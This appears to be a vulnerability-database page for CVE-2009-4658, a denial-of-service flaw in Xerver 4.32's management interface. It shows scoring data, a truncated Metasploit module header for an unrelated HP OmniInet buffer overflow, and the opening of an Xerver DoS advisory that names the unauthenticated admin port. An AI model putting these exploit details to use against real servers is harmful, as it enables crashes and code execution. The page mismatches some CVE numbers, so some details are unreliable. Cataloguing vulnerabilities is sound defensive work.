CVE-2009-4658
Published 2010-03-03
CVE-2009-4658: Xerver 4.32 allows remote authenticated users to cause a denial of service (daemon crash) via a non-numeric web port assignment in the management interface…
Priority P4 16 | medium 4 | CVSS 2.0
AV:N/AC:L/Au:S/C:N/I:N/A:P
EXPLOIT
EPSS: 1.81% (75.9th percentile)
Xerver 4.32 allows remote authenticated users to cause a denial of service (daemon crash) via a non-numeric web port assignment in the management interface. NOTE: this can be leveraged by non-authenticated attackers using CVE-2009-4657.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| omidrouhani | xerver | — | — |
No detection rules found.
Exploit-DB
HP Application Recovery Manager - 'OmniInet.exe' Remote Buffer Overflow
exploitdb·2009-12-26
CVE-2009-3844 HP Application Recovery Manager - 'OmniInet.exe' Remote Buffer Overflow
---
class Metasploit3 'HP Application Recovery Manager (OmniInet.exe) Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in HP Application Recovery Manager OmniInet daemon.
By sending a specially crafted MSG_PROTOCOL packet, a remote attacker may be able to execute arbitrary code.
},
'Author' => 'EgiX ',
'References' =>
[
[ 'CVE', '2009-3884' ],
[ 'BID', '37250' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-091' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 4658,
'BadChars' => '\x00',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x004412ed } ], # OmniInet.exe pop ecx; pop ecx; ret
],
'DefaultTarget' =>
Exploit-DB
Xerver HTTP Server 4.32 - Remote Denial of Service
exploitdb·2009-09-18
CVE-2009-4658 Xerver HTTP Server 4.32 - Remote Denial of Service
---
#################################################################################
# #
# Xerver HTTP Server <= v4.32 Remote Denial of Service #
# Found By: Dr_IDE #
# Download: http://www.javascript.nu/xerver #
# Tested On: Windows XPSP3 #
# #
#################################################################################
- Description -
Xerver v4.32 is a Windows-based HTTP server. This is the latest version of
the application available.
Xerver v4.32 is vulnerable to a remote denial of service through the following means.
Xerver ships with a web-based configuration program, essentially making this DoS
remote if and when the Remote Setup is running.
The admin package runs on port 32123 and does not require any form of
authentication
No writeups or analysis indexed.
2010-03-03
Published